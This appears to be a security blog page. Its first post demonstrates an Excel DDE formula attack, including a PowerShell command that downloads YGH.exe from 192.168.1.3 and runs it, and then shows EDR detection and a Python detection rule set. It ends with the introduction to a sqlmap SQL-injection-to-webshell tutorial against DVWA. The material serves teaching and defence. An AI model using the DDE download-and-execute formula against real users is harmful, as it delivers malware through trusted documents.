MS Excel Command Execution Without Macros

There has recently been a reappearance of a method used to execute commands via malicious Excel files (and other Office documents) without the need for macros.

The method uses Dynamic Data Exchange (DDE). What makes it interesting is that, even though it does cause prompt messages to appear, it doesn't use macros and is therefore less likely to be detected and blocked, and users are more likely to accept the prompts. In addition, as this is a "feature" and not a vulnerability, it is not something that will be patched, and it cannot be easily prevented or blocked.

We will see how to perform a sample attack using DDE and then how easily it can be detected with RSA NetWitness Endpoint.

DDE Sample Attack

To execute a command using DDE, all we have to do is create an Excel file and use the following formula in one of the cells:

=cmd|' /c notepad'!A0

Once the user opens the file and accepts the prompts, notepad.exe will be launched.

To make the attack more interesting, we want to use the same method in conjunction with PowerShell to download and execute our payload (the payload "YGH.exe" is hosted on the "192.168.1.3" server):

=cmd|'/c powershell.exe -w hidden (New-Object System.Net.WebClient).DownloadFile(\"http://192.168.1.3/YGH.exe\",\"c:\\Users\\Public\\YGH.exe\");Start-Process \"c:\\Users\\Public\\YGH.exe\"'!A0

Once the victim opens the file, this is what he sees:

After accepting the first warning message, the victim sees a second warning:

And finally the payload gets downloaded and executed:

In a real-life scenario, the malware would do something stealthier, or provide remote access to the attacker, instead of displaying a message.

Detection Using RSA NetWitness Endpoint (EDR)

Now, from the RSA NetWitness Endpoint point of view, this chain is detected very easily:

  1. IIOCs (Instant IOCs) are triggered for Office running PowerShell and for PowerShell downloading content. These can be used to generate real-time alerts via email and/or Syslog, so that you are notified at an early stage of the attack.
  2. Excel is executed.
  3. Excel launches "cmd.exe". From the command-line arguments we can see that cmd is used to launch PowerShell to download and execute a file called "YGH.exe" from the "192.168.1.3" server.
  4. PowerShell saves the YGH.exe file to disk.
  5. PowerShell executes the YGH.exe file.
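As an added example (not part of the original post, and not RSA NetWitness Endpoint logic), the behavioural indicators listed above can be expressed as a small rule set over process-creation events: a shell or PowerShell whose ancestry includes an Office application, PowerShell whose command line carries a download primitive, and a non-shell binary launched from such a chain. It generalises slightly beyond the post by covering Word and PowerPoint as well as Excel; the events, PIDs and paths below are constructed to mirror the chain in the post and are assumptions, not captured telemetry.

```python
import re
from collections import namedtuple

# Process names in the chain the post describes: Office -> cmd.exe -> PowerShell -> dropped payload.
OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Command-line fragments showing PowerShell is fetching content from the network.
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|start-bitstransfer", re.I)
ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")  # image = full path of the executable

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def ancestors(ev: ProcEvent, by_pid: dict) -> list:
    # Walk the parent chain (nearest parent first); stop at unknown PIDs or cycles.
    chain, seen = [], set()
    while ev.ppid in by_pid and ev.ppid not in seen:
        seen.add(ev.ppid)
        ev = by_pid[ev.ppid]
        chain.append(basename(ev.image))
    return chain

def detect(events: list) -> list:
    # Returns (indicator, pid) pairs for the behaviours listed in the detection section.
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        name, chain = basename(e.image), ancestors(e, by_pid)
        from_office = any(p in OFFICE for p in chain)
        if name in SHELLS and from_office:                      # Office running cmd/PowerShell
            alerts.append(("office_spawns_shell", e.pid))
        if name in {"powershell.exe", "pwsh.exe"} and DOWNLOAD_RE.search(e.cmdline):
            alerts.append(("powershell_download", e.pid))       # PowerShell downloading content
        if name not in SHELLS and chain and chain[0] in SHELLS and from_office:
            alerts.append(("office_chain_runs_binary", e.pid))  # dropped file executed
    return alerts

# Constructed sample events modelled on the post's chain; PIDs and paths are made up.
PAYLOAD = '(New-Object System.Net.WebClient).DownloadFile("http://192.168.1.3/YGH.exe","c:\\Users\\Public\\YGH.exe")'
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1100, 1000, r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE", '"EXCEL.EXE" invoice.xlsx'),
    ProcEvent(1200, 1100, r"C:\Windows\System32\cmd.exe", "cmd /c powershell.exe -w hidden " + PAYLOAD),
    ProcEvent(1300, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -w hidden " + PAYLOAD),
    ProcEvent(1400, 1300, r"C:\Users\Public\YGH.exe", "YGH.exe"),
    ProcEvent(1500, 1000, r"C:\Windows\System32\cmd.exe", "cmd.exe"),  # benign console opened by the user
]
```

Running `detect(SAMPLE_EVENTS)` flags the cmd.exe and PowerShell children of Excel, the PowerShell download, and the execution of YGH.exe, while the console the user opened from Explorer is left alone.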

This shows how an attack vector that can easily bypass traditional preventive solutions can still be detected by RSA NetWitness Endpoint, based on the monitored behaviour of the user's workstation.

This has been detected even though Excel is approved software with a valid, trusted signature and the malware itself didn't perform any malicious activity (it only shows a message to the victim). It demonstrates early detection based on behaviour, before the negative impact actually happens.

From SQL Injection to WebShell

An SQL Injection attack is not limited to dumping a database: it can also allow the attacker to upload files to the remote server and consequently gain remote access via a WebShell.

WebShells can receive commands from the attacker mainly in two ways:

  • based on GET requests, which can easily be detected through logs and SIEM solutions, as the commands are visible in the URL
  • based on POST requests, which is a bit stealthier, as the commands are submitted in the request body and are therefore not part of the logs

In this tutorial we will see how to:

  • use sqlmap to perform an SQL Injection attack
  • dump the database using sqlmap
  • use sqlmap to automatically provide WebShell access based on GET requests
  • use sqlmap to upload a custom and more advanced WebShell (b374k) which relies on POST

To test the SQL Injections, we will use DVWA (Damn Vulnerable Web Application), a web application purposely built with vulnerabilities and weaknesses for pen-testing practice.